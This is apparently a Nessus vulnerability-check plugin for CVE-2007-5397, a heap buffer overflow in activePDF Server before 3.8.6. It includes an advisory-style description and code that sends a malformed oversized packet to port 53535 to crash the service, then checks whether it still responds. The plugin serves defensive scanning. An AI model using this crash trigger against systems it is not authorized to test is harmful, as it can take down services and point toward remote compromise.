#
#  (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31349);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-5397");
  script_bugtraq_id(28013);
  script_xref(name:"Secunia", value:"27371");

  script_name(english:"activePDF Server < 3.8.6 Packet Handling Buffer Overflow Vulnerability");
  script_summary(english:"Tries to crash the service"); 
 
 desc = "
Synopsis :

The remote Windows host contains a program that is affected by a
buffer overflow vulnerability. 

Description :

activePDF Server is installed on the remote host.  It is used to
provide PDF generation and conversion from within enterprise and web
applications. 

The version of activePDF Server installed on the remote host contains
a heap buffer overflow that can be triggered by sending a packet
specifying a size smaller than the actual size of the following data. 
An unauthenticated remote attacker may be able to leverage this issue
to crash the affected service or execute arbitrary code. 

Note that the service runs with SYSTEM privileges, so successful
exploitation could lead to a complete compromise of the affected host. 

See also :

http://secunia.com/secunia_research/2007-87/advisory
http://www.activepdf.com/support/knowledgebase/viewKb.cfm?fs=1&ID=11744

Solution :

Upgrade to activePDF version 3.8.6 or later. 

Risk factor :

Critical / CVSS Base Score : 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)";
  script_description(english:desc);
 
  script_category(ACT_DENIAL);
  script_family(english:"Gain root remotely");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security");

  script_dependencies("find_service1.nasl");
  script_require_ports("Service/activepdf_server", 53535);

  exit(0);
}


include("byte_func.inc");
include("misc_func.inc");


port = get_kb_item("Services/activepdf_server");
if (!port) port = 53535;
if (!get_port_state(port)) exit(0);


# Establish a connection.
soc = open_sock_tcp(port);
if (!soc) exit(0);


# Read the banner.
res = recv(socket:soc, length:32, min:11);


# If it looks like activePDF Server...
if (
  strlen(res) >= 11 && 
  stridx(res, raw_string(0x07, 0x00, 0x00, 0x00, 'APCX-OK')) == 0
)
{
  # Try to crash it.
  set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);

  req = mkdword(0x07) + crap(10000);
  send(socket:soc, data:req);
  res = recv(socket:soc, length:32, min:4);
  close(soc);

  # Try to reestablish a connection and read the banner.
  soc2 = open_sock_tcp(port);
  if (soc2)
  {
    res2 = recv(socket:soc2, length:32, min:11);
    close(soc2);
  }

  # If we couldn't establish the connection or read the banner,
  # there's a problem.
  if (!soc2 || strlen(res2) == 0)
  {
    security_hole(port);
    exit(0);
  }
}
